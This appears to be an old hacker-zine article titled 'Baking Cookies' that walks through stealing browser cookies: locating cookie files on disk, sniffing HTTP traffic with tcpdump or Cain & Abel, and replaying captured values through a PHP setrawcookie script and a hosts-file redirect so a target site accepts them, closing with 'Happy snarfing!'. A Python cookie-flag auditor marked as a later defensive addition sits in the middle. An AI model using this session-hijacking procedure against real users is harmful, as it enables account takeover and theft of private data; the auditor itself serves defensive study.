Baking Cookies

by VileSYN

It's 10 pm.  Do you know where your cookies are?

I'm going to go over a few ways that cookies can be exploited, and why it's not a good idea to keep them in your browser.

Internet Explorer keeps the cookies in:

\Documents and Settings\%User%\Local Settings\Temporary Internet Files

With the file name starting with: Cookie:

Mozilla, on the other hand, saves the cookies.txt file in:

~/.mozilla/default/<random>.slt

Firefox stores it in:

~/.mozilla/firefox/default.s2e

Safari keeps its Cookies.plist file in:

~/Library/Cookies

Now that we know where they are, the question is what to do with them.

Any of the cookie files can be copied and used with the same type of browser on a different machine.  With the snarfed cookies, you can log into the domains that hold cookies and see what data is encapsulated inside.

Other ways to capture cookies include using Cain & Abel from oxid.it on Windows systems.

Another is to sniff packets.  With tcpdump or any other sniffing utility, watching the HTTP port the traffic goes through and using an unlimited snaplen (snapshot length, -s0) so that whole packets are captured instead of just the headers can show some interesting results.

What you are looking for is this:

Set-Cookie: <cookie-name>=<cookie-value>
Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>
Set-Cookie: <cookie-name>=<cookie-value>; Expires=<date>
Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly
Set-Cookie: <cookie-name>=<cookie-value>; Max-Age=<number>
Set-Cookie: <cookie-name>=<cookie-value>; Partitioned
Set-Cookie: <cookie-name>=<cookie-value>; Path=<path-value>
Set-Cookie: <cookie-name>=<cookie-value>; Secure
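A defender looking at the same capture wants to know which of these cookies were snarfable in the first place.  The following Python auditor is added here and is not part of the original article; it parses Set-Cookie headers carrying the attributes listed above and reports the weaknesses the rest of the article relies on: a missing Secure flag (cleartext on the wire), a missing HttpOnly flag, a leading-dot Domain, and an Expires or Max-Age that makes the cookie persist in the on-disk cookie file.  The sample headers are constructed, not taken from a real capture.

```python
# Constructed sample of Set-Cookie headers, in the shape they appear in a
# tcpdump -s0 capture of an HTTP response (not taken from a real capture).
SAMPLE_HEADERS = [
    "Set-Cookie: userid=25; Path=/; Domain=.fake.com",
    "Set-Cookie: password=1; Expires=Wed, 21 Oct 2037 07:28:00 GMT",
    "Set-Cookie: lastvisit=8; Max-Age=3600; Secure",
    "Set-Cookie: session=abc123; Path=/; Secure; HttpOnly",
]


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attrs).

    Attribute keys are lower-cased; flags (Secure, HttpOnly, Partitioned)
    map to True, valued attributes (Domain, Path, Expires...) to a string.
    """
    body = header.split(":", 1)[1].strip()
    parts = [p.strip() for p in body.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_cookie(header):
    """Return (name, findings): the weaknesses that make a cookie snarfable."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("no Secure: sent in cleartext, visible to a sniffer")
    if "httponly" not in attrs:
        findings.append("no HttpOnly: readable by any script on the page")
    domain = attrs.get("domain")
    if isinstance(domain, str) and domain.startswith("."):
        findings.append("leading-dot Domain: accepted by every host under it")
    if "expires" in attrs or "max-age" in attrs:
        findings.append("persistent: written to the on-disk cookie file")
    return name, findings


def audit_all(headers):
    """Map cookie name -> findings for every Set-Cookie header given."""
    return dict(audit_cookie(h) for h in headers)


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_HEADERS).items():
        print(name, "->", "; ".join(findings) or "ok")
```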

You can then take that information and forge your own cookies with a PHP file like this:

<?php
// Values taken from the captured Set-Cookie headers
$cookievalue1 = "1";
$cookievalue2 = "8";
$cookievalue3 = "25";

// setrawcookie(name, value, expire, path, domain, secure):
// expire is one hour from now, path "/" covers the whole site,
// the leading dot on the domain covers every host under fake.com,
// and the last argument (0) leaves the Secure flag off.
setrawcookie("password", $cookievalue1, time() + 3600, "/", ".fake.com", 0);
setrawcookie("lastvisit", $cookievalue2, time() + 3600, "/", ".fake.com", 0);
setrawcookie("userid", $cookievalue3, time() + 3600, "/", ".fake.com", 0);
?>

Here you set three cookies, password, lastvisit, and userid.

Each cookie is assigned a value, an expiration time (one hour from now), a path, a domain, and a secure flag, given here as the integer 0 (false).

There is one trick to this though.  If you try this code as it is, it will not set the cookies.

If the domain in the cookie does not match the host the browser fetched the page from, the browser rejects the cookie.  Of course, there are ways around this.

You simply edit your hosts file, and add a line like this:

127.0.0.1 fake.com

When you navigate to http://fake.com/cookie.php, the name will resolve to your own machine, and the cookies will be set.

With the . in front of the domain, every host under fake.com is affected by this cookie.

You can then navigate to the original web server (i.e., www.fake.com) and it will recognize the cookie as being there.

If the values came from a legitimate source, then the server will see the cookies as being just as legitimate as long as the expiration has not been reached.

So that's it.  Happy snarfing!

Thanx to FBSDHN, SE, and Dale "The Sandgoggle" Texas.
